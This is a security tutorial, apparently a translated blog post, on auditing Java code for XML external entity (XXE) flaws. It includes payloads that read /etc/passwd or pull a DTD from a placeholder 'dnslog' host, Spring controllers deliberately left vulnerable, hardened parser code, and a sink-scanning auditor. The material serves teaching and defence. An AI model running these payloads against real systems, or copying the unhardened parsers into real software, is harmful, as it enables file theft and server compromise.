Java Code Audit: XXE

Published: 2023-08-31 19:56:29  Author: chm0d的安全避风港

1. What is an XXE vulnerability

  An XXE attack, also called XML External Entity injection, is a common web application vulnerability. Through it an attacker can achieve arbitrary file read, directory traversal, internal port probing, attacks on internal websites, DoS (denial of service), command execution and other security impacts.

  XXE can occur whenever an application uses an XML processor to parse XML that references external entities. Typical scenarios are a backend parsing XML request bodies, or backend code parsing an uploaded Excel or Word document.

2. Exploiting XXE

  There are many ways to exploit XXE; broadly they fall into in-band (with echo), blind (no echo) and error-based techniques. For reasons of space I only touch on them briefly; many experts have already explained this thoroughly, and the following two articles give a comprehensive introduction to the XXE attack techniques.

https://xz.aliyun.com/t/3357
https://tttang.com/archive/1813/

  In-band (with echo) PoC:

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY file SYSTEM "file:///etc/passwd">]><root>&file;</root>

  Blind (no echo) PoC:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://dnslog/ext.dtd">%aaa;%ccc;%ddd;]>

  Error-based PoC:

  This PoC comes from phith0n (p牛)'s code audit course (知识星球); see also: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % NUMBER '
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        '>
    %NUMBER;
]>
<message>any text</message>

  Office XXE:

  I have found this vulnerability while hunting on SRC (security response center) programs; the exploitation details are in: https://www.cnblogs.com/chm0d/p/17668508.html

3. XML parsing code walkthrough

  This section covers the two XML parsers that ship with Java itself: DOM parsing and SAX parsing.

  DOM (Document Object Model) parsing: a tree-based parser that loads the entire XML document into memory and organises the document as a tree structure.

import java.io.InputStream;
import java.io.StringReader;
import javax.servlet.http.HttpServletRequest;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

@RestController
public class DOMTest {
    @RequestMapping(value = "/domDemo/vul", method = RequestMethod.POST)
    public String domDemo(HttpServletRequest request) {
        try {
            // read the request body (convertStream is the project's own stream-to-String helper)
            InputStream in = request.getInputStream();
            String body = convertStream.convertStreamToString(in);
            StringReader sr = new StringReader(body);
            InputSource is = new InputSource(sr);

            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            /* Fix: disable DOCTYPE and external entity resolution
            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
            dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            */
            DocumentBuilder db = dbf.newDocumentBuilder();
            Document document = db.parse(is);
            // walk the XML nodes and collect each node's name and text value
            StringBuilder buf = new StringBuilder();
            NodeList rootNodeList = document.getChildNodes();
            for (int i = 0; i < rootNodeList.getLength(); i++) {
                Node rootNode = rootNodeList.item(i);
                NodeList child = rootNode.getChildNodes();
                for (int j = 0; j < child.getLength(); j++) {
                    Node node = child.item(j);
                    buf.append(String.format("%s: %s\n", node.getNodeName(), node.getTextContent()));
                }
            }
            sr.close();
            return buf.toString();
        } catch (Exception e) {
            return "EXCEPT ERROR!!!";
        }
    }
}

  SAX (Simple API for XML) parsing: an event-based parser that reads the XML document line by line and fires specific events as it goes.

import java.io.IOException;
import java.io.InputStream;
import java.io.StringReader;
import javax.servlet.http.HttpServletRequest;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.xml.sax.InputSource;

@RestController
public class SAXTest {
    @RequestMapping("/saxDemo/vul")
    public String saxDemo(HttpServletRequest request) throws IOException {
        // read the request body (convertStream is the project's own stream-to-String helper)
        InputStream in = request.getInputStream();
        String body = convertStream.convertStreamToString(in);
        try {
            SAXParserFactory spf = SAXParserFactory.newInstance();
            // Fix: reject any DOCTYPE declaration
//            spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            SAXParser parser = spf.newSAXParser();
            // SAXParserHandler is the project's own DefaultHandler subclass
            SAXParserHandler handler = new SAXParserHandler();
            // parse the XML
            parser.parse(new InputSource(new StringReader(body)), handler);
            return "Sax xxe vule code";
        } catch (Exception e) {
            return "ERROR....";
        }
    }
}
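The two controllers above keep the hardening commented out, so both parse a DOCTYPE and resolve its entities. The following is an added example (not code from the post or its project) showing the same DOM and SAX factories with the hardening applied, plus a self-check that a DOCTYPE-carrying document is rejected. The sample XML strings are constructed for the demonstration; the entity in WITH_DOCTYPE points at a harmless made-up path. One practical point it shows: with disallow-doctype-decl set, the JDK's built-in parser does not silently drop the entity, it throws a SAXParseException, so callers must expect and handle that exception rather than treat it as a generic parse failure.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class SafeXmlParsing {

    // Constructed samples: a benign document and one with a DOCTYPE declaring an external entity.
    static final String BENIGN =
        "<?xml version=\"1.0\"?><root><name>alice</name></root>";
    static final String WITH_DOCTYPE =
        "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY ext SYSTEM \"file:///constructed/nonexistent\">]>"
      + "<root>&ext;</root>";

    // DOM factory with the four features from the commented-out fix, plus XInclude disabled.
    static DocumentBuilderFactory hardenedDomFactory() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // SAX factory hardened the same way; SAXParserFactory exposes the same setFeature method.
    static SAXParserFactory hardenedSaxFactory() throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        spf.setXIncludeAware(false);
        return spf;
    }

    // Returns the text content of the root element.
    static String parseDom(String xml) throws Exception {
        DocumentBuilder db = hardenedDomFactory().newDocumentBuilder();
        Document doc = db.parse(new InputSource(new StringReader(xml)));
        return doc.getDocumentElement().getTextContent();
    }

    // Collects character events into a String.
    static String parseSax(String xml) throws Exception {
        SAXParser parser = hardenedSaxFactory().newSAXParser();
        StringBuilder text = new StringBuilder();
        parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler() {
            @Override
            public void characters(char[] ch, int start, int len) {
                text.append(ch, start, len);
            }
        });
        return text.toString();
    }

    public static void main(String[] args) throws Exception {
        System.out.println("DOM benign -> " + parseDom(BENIGN));
        System.out.println("SAX benign -> " + parseSax(BENIGN));
        // Any DOCTYPE is refused outright; the parser throws instead of resolving the entity.
        try {
            parseDom(WITH_DOCTYPE);
        } catch (SAXException e) {
            System.out.println("DOM rejected DOCTYPE: " + e.getMessage());
        }
        try {
            parseSax(WITH_DOCTYPE);
        } catch (SAXException e) {
            System.out.println("SAX rejected DOCTYPE: " + e.getMessage());
        }
    }
}
```

Compile and run with javac/java on a stock JDK; no extra dependencies are needed. If a deployment must accept documents that legitimately carry a DOCTYPE, keep the three entity/DTD features disabled and drop only disallow-doctype-decl, and re-test with the DOCTYPE sample.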

Several other ways of parsing XML, together with the corresponding defenses, are covered here: https://blog.spoock.com/2018/10/23/java-xxe/

setFeature alone sometimes still fails to prevent XXE: https://b1ue.cn/archives/387.html

4. Functions (methods) to look for when auditing for XXE

XMLReaderFactory
createXMLReader
SAXBuilder
SAXReader
SAXParserFactory
newSAXParser
Digester
DocumentBuilderFactory
DocumentBuilder
XMLReader
DocumentHelper
XMLStreamReader
SAXParser
SAXSource
TransformerFactory
SAXTransformerFactory
SchemaFactory
Unmarshaller
XPathExpression
javax.xml.parsers.DocumentBuilder
javax.xml.parsers.DocumentBuilderFactory
javax.xml.stream.XMLStreamReader
javax.xml.stream.XMLInputFactory
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder
org.jdom.output.XMLOutputter
oracle.xml.parser.v2.XMLParser
javax.xml.parsers.SAXParser
org.dom4j.io.SAXReader
org.dom4j.DocumentHelper
org.xml.sax.XMLReader
javax.xml.transform.sax.SAXSource
javax.xml.transform.TransformerFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.validation.SchemaFactory
javax.xml.validation.Validator
javax.xml.bind.Unmarshaller
javax.xml.xpath.XPathExpression
java.beans.XMLDecoder
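The list above is what a reviewer greps for. As an added example (not part of the original post), the following small auditor walks a source tree, reports every line that touches one of those sink classes, and notes whether the file contains any known hardening string outside of comments. The marker set and the "hardening seen" heuristic are assumptions of this example; a hit only means "inspect this parser", and a commented-out fix, as in the DOMTest snippet earlier, is deliberately not counted. With no arguments it runs on a constructed in-memory sample in the shape of that snippet.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Stream;

public class XxeSinkAuditor {

    // Sink class names taken from the audit list above.
    static final Pattern SINK = Pattern.compile(
        "\\b(DocumentBuilderFactory|SAXParserFactory|XMLInputFactory|XMLReaderFactory|SAXReader|SAXBuilder|"
      + "TransformerFactory|SAXTransformerFactory|SchemaFactory|Unmarshaller|XMLDecoder|Digester|DocumentHelper)\\b");

    // Assumed hardening markers: feature/property names that indicate DTD or entity handling was restricted.
    static final List<String> HARDENING_MARKERS = Arrays.asList(
        "disallow-doctype-decl", "external-general-entities", "external-parameter-entities",
        "load-external-dtd", "FEATURE_SECURE_PROCESSING", "ACCESS_EXTERNAL_DTD",
        "SUPPORT_DTD", "IS_SUPPORTING_EXTERNAL_ENTITIES");

    // Strips // line comments and /* */ block comments so commented-out fixes are ignored.
    static final Pattern COMMENTS = Pattern.compile("(?s)/\\*.*?\\*/|//[^\\n]*");

    static final class Finding {
        final String file; final int line; final String sink; final boolean hardened; final String code;
        Finding(String file, int line, String sink, boolean hardened, String code) {
            this.file = file; this.line = line; this.sink = sink; this.hardened = hardened; this.code = code;
        }
        @Override public String toString() {
            return String.format("%s:%d [%s] %s -> %s", file, line,
                hardened ? "hardening seen, verify" : "NO HARDENING", sink, code.trim());
        }
    }

    // Reports each sink usage in the file; 'hardened' is true if any marker survives comment stripping.
    static List<Finding> audit(String fileName, List<String> lines) {
        String noComments = COMMENTS.matcher(String.join("\n", lines)).replaceAll("");
        boolean hardened = HARDENING_MARKERS.stream().anyMatch(noComments::contains);
        List<Finding> out = new ArrayList<>();
        for (int i = 0; i < lines.size(); i++) {
            String stripped = COMMENTS.matcher(lines.get(i)).replaceAll("");
            Matcher m = SINK.matcher(stripped);
            if (m.find()) {
                out.add(new Finding(fileName, i + 1, m.group(1), hardened, lines.get(i)));
            }
        }
        return out;
    }

    public static void main(String[] args) throws IOException {
        if (args.length > 0) {
            try (Stream<Path> paths = Files.walk(Paths.get(args[0]))) {
                List<Path> javaFiles = new ArrayList<>();
                paths.filter(p -> p.toString().endsWith(".java")).forEach(javaFiles::add);
                for (Path p : javaFiles) {
                    audit(p.toString(), Files.readAllLines(p)).forEach(System.out::println);
                }
            }
            return;
        }
        // Constructed sample in the shape of the DOMTest controller: the fix sits inside a block comment.
        List<String> sample = Arrays.asList(
            "DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();",
            "/* fix:",
            "dbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);",
            "*/",
            "DocumentBuilder db = dbf.newDocumentBuilder();");
        audit("DOMTest.java", sample).forEach(System.out::println);
    }
}
```

Run as `java XxeSinkAuditor src/main/java` to scan a project; the constructed sample prints a single "NO HARDENING" finding for the DocumentBuilderFactory line because the only marker is inside the block comment. Treat "hardening seen, verify" as a prompt to confirm the features are set on the same factory instance that actually parses user input, which a text scan cannot prove.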